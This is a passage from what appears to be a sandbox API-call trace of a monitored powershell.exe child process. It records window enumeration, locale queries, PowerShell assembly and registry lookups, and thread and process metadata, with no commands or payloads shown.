	[0946.368] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x978
	[0946.368] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xa7c
	[0946.368] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x59c
	[0946.368] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xa88
	[0946.368] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xa6c
	[0946.368] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xa68
	[0946.368] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x9f8
	[0946.368] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xa04
	[0946.368] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x924
	[0946.368] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x8dc
	[0946.369] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x7dc
	[0946.369] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x768
	[0946.369] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x764
	[0946.369] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x820
	[0946.369] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x810
	[0946.369] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x794
	[0946.369] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x83c
	[0946.369] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x7ac
	[0946.369] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xb44
	[0946.369] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x6bc
	[0946.370] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0xb5c
	[0946.370] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x838
	[0946.370] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0946.370] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0946.370] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0946.370] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0946.370] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0946.370] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0946.370] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0946.370] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x4d0
	[0946.371] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x818
	[0946.371] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x5b8
	[0946.371] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x494
	[0946.371] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x1ec
	[0946.371] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x440
	[0946.371] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x7e8
	[0946.371] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x730
	[0946.371] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x2c8
	[0946.371] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xadcc0 | out: lpdwProcessId=0xadcc0) returned 0x31c
	[0946.402] WerSetFlags () returned 0x0
	[0946.419] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0946.419] CoTaskMemFree (pv=0x0) 
	[0946.420] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xae028, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xae020 | out: pulNumLanguages=0xae028, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xae020) returned 1
	[0946.420] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xae028, pwszLanguagesBuffer=0x2e9f2c8, pcchLanguagesBuffer=0xae020 | out: pulNumLanguages=0xae028, pwszLanguagesBuffer=0x2e9f2c8, pcchLanguagesBuffer=0xae020) returned 1
	[0947.041] CoTaskMemAlloc (cb=0x24) returned 0x2201b0
	[0947.041] GetUserDefaultLocaleName (in: lpLocaleName=0x2201b0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0947.041] CoTaskMemFree (pv=0x2201b0) 
	[0947.069] CoTaskMemAlloc (cb=0x104) returned 0x1a1790
	[0947.069] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a1790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.069] CoTaskMemFree (pv=0x1a1790) 
	[0947.071] CoTaskMemAlloc (cb=0x104) returned 0x1a1790
	[0947.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a1790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.071] CoTaskMemFree (pv=0x1a1790) 
	[0947.074] CoTaskMemAlloc (cb=0x104) returned 0x1a1790
	[0947.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a1790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.074] CoTaskMemFree (pv=0x1a1790) 
	[0947.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0947.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0947.671] SetErrorMode (uMode=0x1) returned 0x1
	[0947.671] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xadca0 | out: lpFileInformation=0xadca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0947.671] SetErrorMode (uMode=0x1) returned 0x1
	[0947.671] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xadf10 | out: lpdwHandle=0xadf10) returned 0x94c
	[0947.672] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ea2b58 | out: lpData=0x2ea2b58) returned 1
	[0947.673] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xade88, puLen=0xade80 | out: lplpBuffer=0xade88*=0x2ea2bf4, puLen=0xade80) returned 1
	[0947.674] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x2ea2cd0, puLen=0xaddf0) returned 1
	[0947.674] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0947.674] CoTaskMemAlloc (cb=0x2e) returned 0x21add0
	[0947.674] lstrcpyW (in: lpString1=0x21add0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0947.674] CoTaskMemFree (pv=0x21add0) 
	[0947.674] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x2ea2d24, puLen=0xaddf0) returned 1
	[0947.674] lstrlenW (lpString="System.Management.Automation") returned 28
	[0947.674] CoTaskMemAlloc (cb=0x3c) returned 0x184b20
	[0947.674] lstrcpyW (in: lpString1=0x184b20, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0947.674] CoTaskMemFree (pv=0x184b20) 
	[0947.674] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x2ea2d80, puLen=0xaddf0) returned 1
	[0947.674] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0947.674] CoTaskMemAlloc (cb=0x20) returned 0x220210
	[0947.674] lstrcpyW (in: lpString1=0x220210, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0947.674] CoTaskMemFree (pv=0x220210) 
	[0947.674] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x2ea2dc0, puLen=0xaddf0) returned 1
	[0947.674] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0947.674] CoTaskMemAlloc (cb=0x44) returned 0x184b20
	[0947.674] lstrcpyW (in: lpString1=0x184b20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0947.674] CoTaskMemFree (pv=0x184b20) 
	[0947.674] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x2ea2e28, puLen=0xaddf0) returned 1
	[0947.674] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0947.674] CoTaskMemAlloc (cb=0x76) returned 0x1b0f90
	[0947.674] lstrcpyW (in: lpString1=0x1b0f90, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0947.674] CoTaskMemFree (pv=0x1b0f90) 
	[0947.675] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x2ea2ec4, puLen=0xaddf0) returned 1
	[0947.675] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0947.675] CoTaskMemAlloc (cb=0x44) returned 0x184b20
	[0947.675] lstrcpyW (in: lpString1=0x184b20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0947.675] CoTaskMemFree (pv=0x184b20) 
	[0947.675] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x2ea2f28, puLen=0xaddf0) returned 1
	[0947.675] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0947.675] CoTaskMemAlloc (cb=0x58) returned 0x17bf80
	[0947.675] lstrcpyW (in: lpString1=0x17bf80, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0947.675] CoTaskMemFree (pv=0x17bf80) 
	[0947.675] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x2ea2fa4, puLen=0xaddf0) returned 1
	[0947.675] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0947.675] CoTaskMemAlloc (cb=0x20) returned 0x220210
	[0947.675] lstrcpyW (in: lpString1=0x220210, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0947.675] CoTaskMemFree (pv=0x220210) 
	[0947.675] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x2ea2c4c, puLen=0xaddf0) returned 1
	[0947.675] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0947.675] CoTaskMemAlloc (cb=0x66) returned 0x21ef60
	[0947.675] lstrcpyW (in: lpString1=0x21ef60, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0947.675] CoTaskMemFree (pv=0x21ef60) 
	[0947.675] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x0, puLen=0xaddf0) returned 0
	[0947.675] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x0, puLen=0xaddf0) returned 0
	[0947.675] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xaddf8, puLen=0xaddf0 | out: lplpBuffer=0xaddf8*=0x0, puLen=0xaddf0) returned 0
	[0947.675] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xaddc8, puLen=0xaddc0 | out: lplpBuffer=0xaddc8*=0x2ea2bf4, puLen=0xaddc0) returned 1
	[0947.675] CoTaskMemAlloc (cb=0x204) returned 0x1b40b0
	[0947.675] VerLanguageNameW (in: wLang=0x0, szLang=0x1b40b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0947.676] CoTaskMemFree (pv=0x1b40b0) 
	[0947.676] VerQueryValueW (in: pBlock=0x2ea2b58, lpSubBlock="\\", lplpBuffer=0xade18, puLen=0xade10 | out: lplpBuffer=0xade18*=0x2ea2b80, puLen=0xade10) returned 1
	[0947.683] CoTaskMemAlloc (cb=0x104) returned 0x1a1790
	[0947.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a1790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.684] CoTaskMemFree (pv=0x1a1790) 
	[0947.685] CoTaskMemAlloc (cb=0x104) returned 0x1a1790
	[0947.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a1790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.685] CoTaskMemFree (pv=0x1a1790) 
	[0947.694] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xadce8 | out: phkResult=0xadce8*=0x2ec) returned 0x0
	[0947.696] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xadcd8 | out: phkResult=0xadcd8*=0x2f0) returned 0x0
	[0947.696] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xadd68 | out: phkResult=0xadd68*=0x2f4) returned 0x0
	[0947.699] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xadcac, lpData=0x0, lpcbData=0xadca8*=0x0 | out: lpType=0xadcac*=0x1, lpData=0x0, lpcbData=0xadca8*=0x56) returned 0x0
	[0947.700] CoTaskMemAlloc (cb=0x5a) returned 0x21eef0
	[0947.700] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xadc7c, lpData=0x21eef0, lpcbData=0xadc78*=0x56 | out: lpType=0xadc7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xadc78*=0x56) returned 0x0
	[0947.701] CoTaskMemFree (pv=0x21eef0) 
	[0948.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0948.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0948.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0948.452] CoTaskMemAlloc (cb=0x104) returned 0x1a1790
	[0948.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a1790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.452] CoTaskMemFree (pv=0x1a1790) 
	[0955.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0955.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0956.309] CoTaskMemAlloc (cb=0x104) returned 0x1630a0
	[0956.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1630a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.309] CoTaskMemFree (pv=0x1630a0) 
	[0956.310] CoTaskMemAlloc (cb=0x104) returned 0x2c000b0
	[0956.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c000b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.877] CoTaskMemFree (pv=0x2c000b0) 
	[0956.905] CoTaskMemAlloc (cb=0x104) returned 0x2c000b0
	[0956.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c000b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.905] CoTaskMemFree (pv=0x2c000b0) 
	[0956.905] CoTaskMemAlloc (cb=0x104) returned 0x2c000b0
	[0956.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c000b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.905] CoTaskMemFree (pv=0x2c000b0) 
	[0956.906] CoTaskMemAlloc (cb=0x104) returned 0x2c000b0
	[0956.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c000b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.906] CoTaskMemFree (pv=0x2c000b0) 
	[0958.018] CoTaskMemAlloc (cb=0x104) returned 0x2c000b0
	[0958.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c000b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.018] CoTaskMemFree (pv=0x2c000b0) 
	[0958.021] CoTaskMemAlloc (cb=0x104) returned 0x2c000b0
	[0958.021] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c000b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.021] CoTaskMemFree (pv=0x2c000b0) 
	[0958.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0958.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0967.685] CoTaskMemAlloc (cb=0x104) returned 0x2c002d0
	[0967.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c002d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.685] CoTaskMemFree (pv=0x2c002d0) 
	[0967.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xad9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0967.701] SetErrorMode (uMode=0x1) returned 0x1
	[0967.701] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xadc40 | out: lpFileInformation=0xadc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0967.701] SetErrorMode (uMode=0x1) returned 0x1

Thread:
	id = 638
	os_tid = 0x1424


Thread:
	id = 653
	os_tid = 0x1464


Thread:
	id = 1302
	os_tid = 0x1d64


Thread:
	id = 1306
	os_tid = 0x1d80


Thread:
	id = 1338
	os_tid = 0x1e4c


Thread:
	id = 1430
	os_tid = 0x1b98


Thread:
	id = 1594
	os_tid = 0x2164


Thread:
	id = 1600
	os_tid = 0x2178

	[0824.667] CoGetContextToken (in: pToken=0x1b5af6d0 | out: pToken=0x1b5af6d0) returned 0x0
	[0824.668] CObjectContext::QueryInterface () returned 0x0
	[0824.668] CObjectContext::GetCurrentThreadType () returned 0x0
	[0824.668] Release () returned 0x0
	[0824.668] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Process:
	id = "106"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x194ce000"
	os_pid = "0x13f8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
